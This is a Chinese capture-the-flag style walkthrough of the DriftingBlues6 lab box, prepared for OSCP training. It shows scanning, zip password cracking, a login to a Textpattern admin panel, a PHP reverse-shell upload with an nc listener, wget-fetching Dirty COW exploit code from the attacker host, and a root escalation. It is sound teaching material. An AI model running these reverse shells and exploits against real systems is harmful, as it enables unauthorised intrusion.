OSCP系列靶场-Esay-DriftingBlues6

admin 2023年7月29日14:48:49评论14 views字数 4257阅读14分11秒阅读模式

本文由掌控安全学院-杳若投稿

总结

getwebshell → 大字典目录扫描.zip后缀 → 信息泄露获取后台登录权限 → 文件上传漏洞getwebshell

提 权 思 路 → 基础信息收集发现内核版本偏低 → 脏牛提权

准备工作

  • 启动VPN
    获取攻击机IP > 192.168.45.171

OSCP系列靶场-Esay-DriftingBlues6

  • 启动靶机
    获取目标机器IP > 192.168.244.219

OSCP系列靶场-Esay-DriftingBlues6

信息收集-端口扫描

目标开放端口收集

  • Nmap开放端口扫描2次
    
    
  1. sudo nmap --min-rate 10000 -p- 192.168.244.219

OSCP系列靶场-Esay-DriftingBlues6
通过两次收集到的端口:→80

目标端口对应服务探测


  1. # tcp探测
  2. sudo nmap -sT -sV -O -sC -p80 192.168.244.219

OSCP系列靶场-Esay-DriftingBlues6

信息收集-端口测试

只有一个80端口是突破口

80-HTTP端口的信息收集

访问 http://192.168.244.219:80 不是一个标准的CMS

OSCP系列靶场-Esay-DriftingBlues6

信息收集-源码查看


  1. # 包括文章中是否写明一些敏感信息
  2. curl http://192.168.244.219:80

通过网站发现有很大的怨念,源码里面发现了一个网站
vvmlist.github.io<mark style="background: #FFB8EBA6;">(若没思路的话尝试访问)</mark>


  1. please hack vvmlist.github.io instead
  2. he and their army always hacking us -->
  3. ![](https://nc0.cdn.zkaq.cn/md/12087/882bc2f952902c49f671686a06f057a1_44078.png)
  4. #### 信息收集-目录扫描
  5. ##### 信息收集-目录扫描初步
  6. 如果扫描发现301适当考虑 -r 2 进行递归
  7. ```shell
  8. dirsearch -u http://192.168.244.219:80 -x 302,403

OSCP系列靶场-Esay-DriftingBlues6

因为扫出了目录,深层次的扫描待选


  1. 信息收集-目录扫描(后缀)
  2. 信息收集-目录扫描(深度/大字典)
  3. 信息收集-目录扫描(深度/大字典后缀)

信息收集-端点访问


  1. [16:39:21] 200 - 52KB - /db
  2. [16:39:30] 200 - 750B - /index
  3. [16:39:30] 200 - 750B - /index.html
  4. [16:39:56] 200 - 110B - /robots.txt
  5. [16:40:06] 200 - 12KB - /textpattern/
db端点(没思路考虑)" class="reference-link">db端点(没思路考虑)

是一张图片,推测可能存在隐写,先下载下来吧

OSCP系列靶场-Esay-DriftingBlues6


  1. wget http://192.168.244.219:80/db

OSCP系列靶场-Esay-DriftingBlues6

/robots.txt端点" class="reference-link">/robots.txt端点

得到了新的目录/textpattern/textpattern以及提示
说明目录扫描的时候需要添加后缀字典

OSCP系列靶场-Esay-DriftingBlues6

信息收集-目录扫描(后缀)

  1. # -t 指定线程 -x 添加后缀扩展名 (根据网站脚本语言加后缀)
  2. gobuster dir -u http://192.168.244.219:80 -w /usr/share/wordlists/dirb/big.txt -t 10 -x .html,.php,.zip
/textpattern端点" class="reference-link">/textpattern端点

在该端点下没有什么功能点

OSCP系列靶场-Esay-DriftingBlues6

/textpattern/textpattern端点" class="reference-link">/textpattern/textpattern端点

发现是一个登录界面,应该是标准的CMS
在登录界面可以尝试弱口令、漏洞攻击(需要知道版本最佳)、爆破等等,乘着在目录扫描后缀的时候试试该端点

OSCP系列靶场-Esay-DriftingBlues6

/textpattern/textpattern端点指纹识别" class="reference-link">/textpattern/textpattern端点指纹识别

  1. whatweb http://192.168.244.219:80/textpattern/textpattern

CMSTextpattern

OSCP系列靶场-Esay-DriftingBlues6

vvmlist.github.io访问

在目前还在扫描的情况下,就先去访问之前放置在一边的url

OSCP系列靶场-Esay-DriftingBlues6
网络不是很稳定还有丢包 ≧ ﹏ ≦
访问网站发现没什么有用的内容,尝试图片的隐写术测试
总体来说图片隐写术也是需要密码才能解密的,因此希望放回到目录爆破上

信息收集-目录扫描(max)

扫完之后发现没有.zip的内容,决定上更大的字典(哭了)

OSCP系列靶场-Esay-DriftingBlues6

kali自带的字典如下


  1. # 字典行数 20469(一般字典)
  2. cat /usr/share/wordlists/dirb/big.txt
  3. # 字典行数 220560(大字典)
  4. cat /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

  1. # -t 指定线程 -x 添加后缀扩展名 (根据网站脚本语言加后缀)
  2. gobuster dir -u http://192.168.244.219:80 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 100 -x .zip

发现存在/spammer.zip文件

OSCP系列靶场-Esay-DriftingBlues6

信息收集-端点访问

/spammer.zip端点访问" class="reference-link">/spammer.zip端点访问

扫描发现了/spammer.zip端点后,应该是个文件夹,首先下载


  1. wget http://192.168.244.219/spammer.zip

OSCP系列靶场-Esay-DriftingBlues6

尝试解压发现需要密码

OSCP系列靶场-Esay-DriftingBlues6

暴力破解-hash密码破解

  1. # 利用zip2john将zip转换
  2. zip2john spammer.zip > password.hash
  3. # 利用john离线破译hash的zip密码
  4. john --wordlist=/usr/share/wordlists/rockyou.txt password.hash

通过爆破得到密码为myspace4

OSCP系列靶场-Esay-DriftingBlues6
得到了一个文件creds.txt
OSCP系列靶场-Esay-DriftingBlues6

漏洞利用-getwebshell

信息泄露登录web

打开我们解密的文件得到了账号密码的信息mayer:lionheart

OSCP系列靶场-Esay-DriftingBlues6
由于没有SSH端口,推测是在登录端点登录
提示时间不对,不管直接打勾登录
OSCP系列靶场-Esay-DriftingBlues6

文件上传getwebshell

成功进入后台

OSCP系列靶场-Esay-DriftingBlues6

获取CMS版本信息

通常第一步是要获取对应的版本信息,在左下角发现了版本
Textpattern 4.8.3

OSCP系列靶场-Esay-DriftingBlues6
利用msf寻找是否存在通用漏洞
searchsploit textpattern 4.8.3后发现了代码执行漏洞
OSCP系列靶场-Esay-DriftingBlues6
查看一下脚本该怎么用


  1. cat /usr/share/exploitdb/exploits/php/webapps/49620.py

OSCP系列靶场-Esay-DriftingBlues6

根据脚本的要求需要3个参数 网址 账号以及密码


  1. python /usr/share/exploitdb/exploits/php/webapps/49620.py -t http://192.168.244.219:80/textpattern/textpattern -u mayer -p lionheart

发现运行不了

OSCP系列靶场-Esay-DriftingBlues6
尝试换了一个脚本


  1. python /usr/share/exploitdb/exploits/php/webapps/48943.py http://192.168.244.219:80/textpattern mayer lionheart

发现里面有一行报错了

OSCP系列靶场-Esay-DriftingBlues6

(╯▔皿▔)╯上面的脚本是运行没发现,下面的脚本是运行出错了,决定手动上传
找到上传点

OSCP系列靶场-Esay-DriftingBlues6

上传php的文件成功,没有过滤

OSCP系列靶场-Esay-DriftingBlues6

上传之后不太清楚文件的上传位置,搜了一下网上的利用方式,发现上传位置

OSCP系列靶场-Esay-DriftingBlues6

php反弹shell

清楚了之后我们可以尝试getwebshell
kali里面已经给我们准备好了反弹shell文件


  1. # 利用cp命令cp一个到当前文件夹
  2. sudo cp /usr/share/webshells/php/php-reverse-shell.php .

  1. # 开启监听
  2. nc -lvvp 5555

OSCP系列靶场-Esay-DriftingBlues6


  1. # 换个名字
  2. cp php-reverse-shell.php ./shell11.php
  3. # 修改一下shell的反代地址
  4. vim shell11.php

OSCP系列靶场-Esay-DriftingBlues6
上传成功
OSCP系列靶场-Esay-DriftingBlues6
访问 http://192.168.244.219:80/textpattern/files/shell11.php
成功getwebshell
OSCP系列靶场-Esay-DriftingBlues6

内网遨游-getshell

交互shell

由于获取的shell交互不友好,利用python获得新的交互shell


  1. $ python -c "import pty;pty.spawn('/bin/bash')";
  2. www-data@driftingblues:/$

OSCP系列靶场-Esay-DriftingBlues6

提权基础(内网信息收集)

提权的本质在于枚举

检测Linux操作系统的发行版本


  1. # 确定发行版本
  2. cat /etc/lsb-release # Debian based

Debian 7发行版不太能overlayfs提权

OSCP系列靶场-Esay-DriftingBlues6

检测Linux操作系统的内核版本


  1. cat /proc/version
  2. uname -a

看上去内核版本有点老 3.2.0 存在提权漏洞

OSCP系列靶场-Esay-DriftingBlues6

权限提升

脏牛内核提权尝试

利用msf搜索内核版本
searchsploit Linux 3.2.0 发现比较多的是脏牛提权,使用对应文件

OSCP系列靶场-Esay-DriftingBlues6

查看文件确认编译语句


  1. 使用该脚本会建立一个 firefart 的特权账号 密码自输

OSCP系列靶场-Esay-DriftingBlues6
这里选用了40839.c,没选择其他的条件竞争

python3开启http服务

  1. # 利用python开启http服务,方便目标机器上下载文件
  2. sudo python3 -m http.server 81

OSCP系列靶场-Esay-DriftingBlues6


  1. # 目标机器到tmp目录下下载(有下载权限)
  2. cd /tmp
  3. # 下载
  4. wget http://192.168.45.157:81/40839.c
  5. # 给权限
  6. chmod +x 40839.c
  7. # 编译
  8. gcc -pthread 40839.c -o shell -lcrypt
  9. # 给权限
  10. chmod +x shell
  11. # 运行
  12. ./shell

OSCP系列靶场-Esay-DriftingBlues6
利用 su firefart 和密码登录之后可以成功访问root目录,提权成功
OSCP系列靶场-Esay-DriftingBlues6

FLAG2获取


  1. # 本靶场只有一个flag
  2. firefart@driftingblues:~# cat /root/proof.txt
  3. ********************

OSCP系列靶场-Esay-DriftingBlues6

完结撒花~

申明:本公众号所分享内容仅用于网络安全技术讨论,切勿用于违法途径,

所有渗透都需获取授权,违者后果自行承担,与本号及作者无关,请谨记守法.

OSCP系列靶场-Esay-DriftingBlues6

原文始发于微信公众号(掌控安全EDU):OSCP系列靶场-Esay-DriftingBlues6

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年7月29日14:48:49
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   OSCP系列靶场-Esay-DriftingBlues6https://cn-sec.com/archives/1917144.html

发表评论

匿名网友 填写信息